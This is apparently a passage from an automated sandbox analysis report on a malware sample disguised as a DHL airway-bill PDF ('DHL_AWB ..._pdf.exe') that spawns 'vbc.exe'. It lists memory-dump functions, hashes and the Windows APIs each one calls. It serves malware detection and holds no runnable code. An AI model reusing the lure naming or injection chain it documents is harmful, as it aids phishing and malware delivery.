                                                                                                                                                                  • Instruction Fuzzy Hash: CF4115B0E0520ADFDB49CFA9C5815AEFBF2FF89210F65C46AC409AB214D3349A45CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A5840, Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b8827885099e9608df9b66d24aaf67a1c3017b96456b1d4836bd3a71dc616e31
                                                                                                                                                                  • Instruction ID: a67fab4297a11b52e508dfdb3f7424ea8b13ad39ee52c4bae2019a8bfba5c1d0
                                                                                                                                                                  • Opcode Fuzzy Hash: b8827885099e9608df9b66d24aaf67a1c3017b96456b1d4836bd3a71dc616e31
                                                                                                                                                                  • Instruction Fuzzy Hash: BB4105B0E0520ACFDB08CFAAC5815AEFBB2FF88200F65C46AC419A7214D3349A45CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 019A5A28, Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f988ef5f98e7fbf4b639ffac19dd2680ce314761650bc780329937e667e7cac8
                                                                                                                                                                  • Instruction ID: 560f3bbf4149727c1634d85f1707ce3cb7fffc4052b4b6722483647da703df64
                                                                                                                                                                  • Opcode Fuzzy Hash: f988ef5f98e7fbf4b639ffac19dd2680ce314761650bc780329937e667e7cac8
                                                                                                                                                                  • Instruction Fuzzy Hash: 37416971E156588FEB28CF6B8D45699FBF3AFC9300F14C1BA850CA6225DB300A868F51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C9C78, Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f9e865361c3663194cce2325bbc95958e451358812a6203ee4d574b5b1f38a74
                                                                                                                                                                  • Instruction ID: b2ff25cb4d20f368fe4faab0d0c7ecdc89e2da178f21d67729ee1883635a6fd0
                                                                                                                                                                  • Opcode Fuzzy Hash: f9e865361c3663194cce2325bbc95958e451358812a6203ee4d574b5b1f38a74
                                                                                                                                                                  • Instruction Fuzzy Hash: 5841EEB4D05248DFCB10CFA9E984ADDBBF4BF49310F14806AE809BB210D335A959CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 058C69AC, Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1be37866486bac6cb9bb65339c9a34748450bd804bf997a76bccca4cb9491caf
                                                                                                                                                                  • Instruction ID: e1599687a57886d79db465093d95f680db8438c016af0b918ae043a020ac16b4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1be37866486bac6cb9bb65339c9a34748450bd804bf997a76bccca4cb9491caf
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D31AAB4D052089FCB10CF99D584AEEFBF5BB49310F14906AE915B7310D374A945CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Analysis Process: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960 Parent PID: 2172 DHL_AWB 518877882999_887755468_pdf.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 0605E66A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0605E6D8
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0605E715
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0605E752
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0605E7AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 2063062207-2365745527
                                                                                                                                                                  • Opcode ID: 6d51646afb2f2f37a241e22c13440192e267ca30f5584264516162fb9f9e0ca4
                                                                                                                                                                  • Instruction ID: 3e5a9ef075a8ed5573850b731a18802e44e7d079d03efe1280264fc15930b67c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d51646afb2f2f37a241e22c13440192e267ca30f5584264516162fb9f9e0ca4
                                                                                                                                                                  • Instruction Fuzzy Hash: EB5184B49002498FDB40CFAACA887DEBFF5AF48314F24886AE409B7350D7345985CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0605E678, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0605E6D8
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0605E715
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0605E752
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0605E7AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 2063062207-2365745527
                                                                                                                                                                  • Opcode ID: 4a0a512914cdc462a82f3b4d3e2262cff1cbba0bc9376c3a230308c2ba277946
                                                                                                                                                                  • Instruction ID: bd20da4f31ba465def18db0f5f0dcfbd6a2d99026710136f53c0462d1a530f94
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a0a512914cdc462a82f3b4d3e2262cff1cbba0bc9376c3a230308c2ba277946
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F5164B49006098FDB50CFAADA88BDEBBF5BF48314F24886AE419B3350D7745984CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0605CCAD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0605CDCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID: slXO$slXO
                                                                                                                                                                  • API String ID: 716092398-3729817228
                                                                                                                                                                  • Opcode ID: bd8a67a021d26ae098d35e611910b91b97726cafbdb2969ee35f8dc60d4de884
                                                                                                                                                                  • Instruction ID: 037b6673139c6fb82a442973e6ada38cece7673a03990e74e99c4c32b621ae57
                                                                                                                                                                  • Opcode Fuzzy Hash: bd8a67a021d26ae098d35e611910b91b97726cafbdb2969ee35f8dc60d4de884
                                                                                                                                                                  • Instruction Fuzzy Hash: E151EFB5D003099FDB14CFA9C980ADEBFB5BF48310F25852AE819AB210D7749896CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0605B014, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0605CDCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID: slXO$slXO
                                                                                                                                                                  • API String ID: 716092398-3729817228
                                                                                                                                                                  • Opcode ID: 649af2d752740e13df9e7be6ddab2c9e8f0b0b82f51d3ed163f6a17e1b39e91e
                                                                                                                                                                  • Instruction ID: 16a0711df4fade08d7e65c627a6bf0ce4921080c6e46cfcba2acb2937bb0f483
                                                                                                                                                                  • Opcode Fuzzy Hash: 649af2d752740e13df9e7be6ddab2c9e8f0b0b82f51d3ed163f6a17e1b39e91e
                                                                                                                                                                  • Instruction Fuzzy Hash: A851BDB5D003099FDB14CF99C884ADEBFB5BF48314F25852AE819AB210D774A895CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 06051B60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 06051C47
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: slXO$slXO
                                                                                                                                                                  • API String ID: 1029625771-3729817228
                                                                                                                                                                  • Opcode ID: 9512125f30a54aa55381437b2de7d25a1e14ea4a55a8d90f7f0f4aed3190d327
                                                                                                                                                                  • Instruction ID: 39e53aafe5b5a9de4f0eda1e0141eb8b5445df00308e595f731c1b981833372c
                                                                                                                                                                  • Opcode Fuzzy Hash: 9512125f30a54aa55381437b2de7d25a1e14ea4a55a8d90f7f0f4aed3190d327
                                                                                                                                                                  • Instruction Fuzzy Hash: AB4122B0D006598FDB50CFA9C884B9EBFF1FB48314F15896AD815AB380D7B59886CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0605E3EC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0605F849
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 2714655100-2365745527
                                                                                                                                                                  • Opcode ID: 93aa68de55f3ef152476db4815addc200177fa32e572ec0c9964c506977bce63
                                                                                                                                                                  • Instruction ID: f542e71f0075564fdb872c2e0a11d2fce547f4af69b59708fc52b48dff7dc919
                                                                                                                                                                  • Opcode Fuzzy Hash: 93aa68de55f3ef152476db4815addc200177fa32e572ec0c9964c506977bce63
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B4128B4900709CFDB50CF99C488AABBBF5FB88314F258859D919A7321C774A841CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0169662F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3334572018-2365745527
                                                                                                                                                                  • Opcode ID: f52da841c7d53f211219bd76674d1690067a5cdee72c37880f46c61c145b453d
                                                                                                                                                                  • Instruction ID: 9bebdfa272f090e0f126eb3b38daf73aea97dc6db497b76c3c6b5b7402849dee
                                                                                                                                                                  • Opcode Fuzzy Hash: f52da841c7d53f211219bd76674d1690067a5cdee72c37880f46c61c145b453d
                                                                                                                                                                  • Instruction Fuzzy Hash: 18218D719003099FDB10CF99C844BEFBBF9FB48324F148429E918A7350D778A941CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0605E304, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0605E866,?,?,?,?,?), ref: 0605E927
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3793708945-2365745527
                                                                                                                                                                  • Opcode ID: 98aeb5f242f55ab0a18bfb754812ef2fc071a092120405c838873202d31911ab
                                                                                                                                                                  • Instruction ID: 7b5882f5157928d85c205dd600183f58d664931bee419e5ec536c094d678fe63
                                                                                                                                                                  • Opcode Fuzzy Hash: 98aeb5f242f55ab0a18bfb754812ef2fc071a092120405c838873202d31911ab
                                                                                                                                                                  • Instruction Fuzzy Hash: DA21E4B59002099FDB50CFA9D884ADEBBF8FB48324F14842AE954A3310D374AA55CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0169663C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3334572018-2365745527
                                                                                                                                                                  • Opcode ID: 8b635b6f60ead41a01ec43ad6f34b6543636c5fc3c0f2460040bce6da376e2b1
                                                                                                                                                                  • Instruction ID: 935c20a5e2f8fb5c4714ded7d2379bbd1746ae2921f30e116e661f3b0eee35fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b635b6f60ead41a01ec43ad6f34b6543636c5fc3c0f2460040bce6da376e2b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A216A719003099FDB14CF9AC844BEEBBF9FB88324F148429E919A7340D778A945CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 01696A60, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3334572018-2365745527
                                                                                                                                                                  • Opcode ID: 553bd484402fc461b5bb32a9f1db36aa2d5dfdcdbd8fc5c15f34b0676e221216
                                                                                                                                                                  • Instruction ID: c6af1bb0daa7acf3b95542b46fdecfe474fbd1367b3368cc8c0e442e7329d01d
                                                                                                                                                                  • Opcode Fuzzy Hash: 553bd484402fc461b5bb32a9f1db36aa2d5dfdcdbd8fc5c15f34b0676e221216
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B215C719002098FDB14CF9AC844BEEBBF9FF88324F148429D959A7350D778A985CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 01696890, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 01696910
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumResourceTypes
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 29811550-2365745527
                                                                                                                                                                  • Opcode ID: 3dfc7cd586b945bdffa4093d5de7a3066745f68c49f4a6c15a8865163282af07
                                                                                                                                                                  • Instruction ID: d3b4262438c2fb304ceb60af845f38f01d9be443a67d9ecb0524ce04afe577cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3dfc7cd586b945bdffa4093d5de7a3066745f68c49f4a6c15a8865163282af07
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E2136B19002098FDB14DF99C844BEEBBF9EF88324F14842AD914A7350C774A985CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 01696898, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 01696910
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumResourceTypes
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 29811550-2365745527
                                                                                                                                                                  • Opcode ID: 92de6d0da4d9bedf19d1f63fdd8904aef76d78f806d4e42bcc43d2469bef2d18
                                                                                                                                                                  • Instruction ID: d55ad25d7e1589701be622389b5a52ffa2042cc0887f8d2e071c587fb8cf5135
                                                                                                                                                                  • Opcode Fuzzy Hash: 92de6d0da4d9bedf19d1f63fdd8904aef76d78f806d4e42bcc43d2469bef2d18
                                                                                                                                                                  • Instruction Fuzzy Hash: DD2125B1D002098FDB14CFA9C844BEEFBF9EB88324F14842AD515A3250DB74A955CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0161D4EC, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522610508.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c808a03b22139f9c068887cb34f06646ad411ee6743f5b91aa212c2d62de3568
                                                                                                                                                                  • Instruction ID: 4f8d9b67528c3bfd52e1a23d3f8a646de10b367e19818601178ef6a08ad85cea
                                                                                                                                                                  • Opcode Fuzzy Hash: c808a03b22139f9c068887cb34f06646ad411ee6743f5b91aa212c2d62de3568
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B210AB1504244EFDB05DF94DDC4B26BF66FB88328F28C969E9050B34AC336D456C7A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D0F4, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bc6b508178a7f45273f5c2d8fed1443c1359ac0e0e397d77a3057420a3027337
                                                                                                                                                                  • Instruction ID: 99c135e75e597e4a149e59b374899829d7d9ef718b7daaf61bc936947ca5ae8e
                                                                                                                                                                  • Opcode Fuzzy Hash: bc6b508178a7f45273f5c2d8fed1443c1359ac0e0e397d77a3057420a3027337
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B21F6B5504244EFDB01DF94DCC0B1ABB65FBC4325F64C969E8090B346C336D456CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D1D4, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6365d5ba40cb7ebaad857e325b3b41daec34cbbc510b8131c998d0f895b54e87
                                                                                                                                                                  • Instruction ID: 5d6234ef353a0884cf876e475442da762d561942b370f230669e88e402672f23
                                                                                                                                                                  • Opcode Fuzzy Hash: 6365d5ba40cb7ebaad857e325b3b41daec34cbbc510b8131c998d0f895b54e87
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521F271504204EFDB05CF94D9C0B26BBA5FBC4328F64C9A9EA494B346C736D856CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D01C, Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bab327966ba48b3b85d7355df218dfe02124122b1f0b0357edaa6cccd6ca2421
                                                                                                                                                                  • Instruction ID: a7b0798641187a7ff73d4000c2b98103efb60ec254335ea2050e36288e51dff4
                                                                                                                                                                  • Opcode Fuzzy Hash: bab327966ba48b3b85d7355df218dfe02124122b1f0b0357edaa6cccd6ca2421
                                                                                                                                                                  • Instruction Fuzzy Hash: DB212371504244DFDB11DFA4DDC0B2AFBA9FBC4B64F608969D80A0B346C336E847C6A2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0161D4E7, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522610508.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
                                                                                                                                                                  • Instruction ID: af03d6e0531a22ba9784a0e986630e0a7b8f1f6d259ccc0f638e3a46931af1c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
                                                                                                                                                                  • Instruction Fuzzy Hash: EC11B176404280CFCB06CF54D9C4B16BF72FB88324F28C6A9D8050B75AC33AD45ACBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D0EF, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 707d818f100045568a466e100df3d2f5c0351ec6e40217f184867a9ba66f2197
                                                                                                                                                                  • Instruction ID: 26307fb577283b3172642385b0fa52f464fba16c00196749ffb024234ac2f795
                                                                                                                                                                  • Opcode Fuzzy Hash: 707d818f100045568a466e100df3d2f5c0351ec6e40217f184867a9ba66f2197
                                                                                                                                                                  • Instruction Fuzzy Hash: B8116D76504284DFDB12CF54D9C4B19BF61FB84324F28C6AAD8494B746C33AD44ACBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D1CF, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction ID: 3b0ddaf07e37e6ec8088da353dd0bfc5b87b7a9f3bfbcb217b5914fbf923b385
                                                                                                                                                                  • Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11BB75504280DFCB02CF54D9C0B15BBA1FB84324F28C6A9D9494B756C33AD44ACB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0163D017, Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4fd165d615cc9fe6bac0729f065a9cfc4c529efd83ef74c4f0e3b29a79a694c5
                                                                                                                                                                  • Instruction ID: b92439288ae66e9147c09ba4b1ffe4f8b3776caae0ded5ab27357cd5e6b6a844
                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd165d615cc9fe6bac0729f065a9cfc4c529efd83ef74c4f0e3b29a79a694c5
                                                                                                                                                                  • Instruction Fuzzy Hash: E411BF75504680DFDB12CF14D9C4B1AFF61FB84724F24C6AAD8494B746C33AD44ACBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Analysis Process: vbc.exe PID: 5232 Parent PID: 2960 vbc.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 0040978A, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004097B2
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
